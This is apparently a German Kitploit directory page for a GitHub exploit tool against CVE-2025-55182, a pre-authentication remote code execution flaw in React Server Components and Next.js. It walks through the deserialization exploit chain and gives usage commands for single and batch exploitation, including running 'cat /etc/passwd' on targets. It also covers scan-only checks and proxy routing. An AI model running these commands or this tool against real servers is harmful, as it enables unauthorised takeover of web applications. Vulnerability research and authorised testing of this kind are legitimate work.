Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 | Kitploit
Tools/GitHubGitHub/luoluoqingge/cve-2025-55182
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubluoluoqingge/cve-2025-55182

CVE-2025-55182

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 - React2Shell

React Server Components / Next.js Remote-Codeausführung vor der Authentifizierung

ParameterWert
CVE IDCVE-2025-55182
CVSS10.0 (Critical)
CWECWE-502: Deserialization of Untrusted Data
TypPre-Auth RCE

Betroffene Versionen

KomponenteBetroffene Versionen
React19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6
Zugehörige Paketereact-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel

Funktionsweise der Schwachstelle

Die Schwachstelle nutzt einen Deserialisierungsfehler im Flight-Protokoll von React Server Components (RSC) aus und ermöglicht durch manipulierte multipart/form-data-Anfragen eine nicht authentifizierte Remote-Codeausführung. Die vollständige Exploit-Kette ist wie folgt:

  1. Ein POST multipart/form-data-Request in Kombination mit dem Next-Action-Header löst den Server-Action-Pfad aus
  2. Chunk "0" enthält ein gezielt konstruiertes JSON-Objekt (nicht in ein Array verpackt); $1:__proto__:then greift auf Chunk.prototype.then des Chunk-1-Objekts im PENDING-Status zu und macht es zu einem thenable
  3. $1:constructor:constructor wird über die Prototypenkette als Function-Konstruktor aufgelöst
  4. Chunk.prototype.then ruft initializeModelChunk auf, um das Feld value mit dem Wert '{"then":"$B0"}' zu parsen
  5. Die Parsierung des $B0-Blobs ruft _formData.get(_prefix + "0") auf, also Function(code + "0")

Installation der Abhängigkeiten

root@kitploit:~
pip install requests[socks]

Das Skript versucht bei fehlenden Abhängigkeiten automatisch, requests und PySocks zu installieren.

Verwendung

RCE gegen ein einzelnes Ziel

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id"

Batch-Ausnutzung

root@kitploit:~
python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt

Nur Schwachstellenprüfung (ohne Befehlsausführung)

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt

Proxy verwenden

root@kitploit:~
# HTTP 代理
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080

# SOCKS5 代理
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080

Debug-Modus

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id" -v

Vollständige Parameterübersicht

Erläuterung der Ausgaben

  • VULN — Ziel ist anfällig, Befehlsergebnis erfolgreich abgerufen
  • MAYBE — Möglicherweise anfällig (z. B. Lesetimeout)
  • ERR — Verbindungsfehler
  • SAFE — Keine Schwachstelle erkannt

Ergebnisse von Batch-Scans werden in die mit -o angegebene Ausgabedatei geschrieben; aufgenommen werden nur Ziele, bei denen die Schwachstelle bestätigt wurde.

Beispiel für das Format von targets.txt

root@kitploit:~
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# 注释行会被忽略

Haftungsausschluss

Dieses Tool dient ausschließlich autorisierten Sicherheitstests und Zwecken der Sicherheitsforschung. Der Anwender muss sicherstellen, dass er die ausdrückliche Genehmigung des Eigentümers des Zielsystems eingeholt hat. Nicht autorisierte Penetrationstests an Systemen sind rechtswidrig; der Anwender trägt die volle rechtliche Verantwortung selbst.

Tool herunterladen
  • Das zurückgegebene Funktionsobjekt besitzt selbst eine then-Eigenschaft, wird als thenable behandelt und aufgerufen, wodurch die Codeausführung ausgelöst wird (RCE)
  • ParameterBeschreibungStandardwert
    -u, --urlEinzelne Ziel-URL (schließt sich mit -f gegenseitig aus)-
    -f, --fileDatei mit Zielliste, eine URL pro Zeile (schließt sich mit -u gegenseitig aus)-
    -c, --commandAuszuführender Systembefehl (im --check-Modus nicht erforderlich)-
    -o, --outputErgebnisausgabedateiresults.txt
    -t, --threadsAnzahl paralleler Threads10
    -v, --verboseDebug-Ausgabe anzeigenFalse
    --proxyProxy-Adresse, unterstützt HTTP und SOCKS5-
    --timeoutAnfragetimeout (Sekunden)15
    --checkNur Schwachstelle prüfen, keine Systembefehle ausführenFalse
    --verify-sslTLS-Zertifikate verifizierenFalse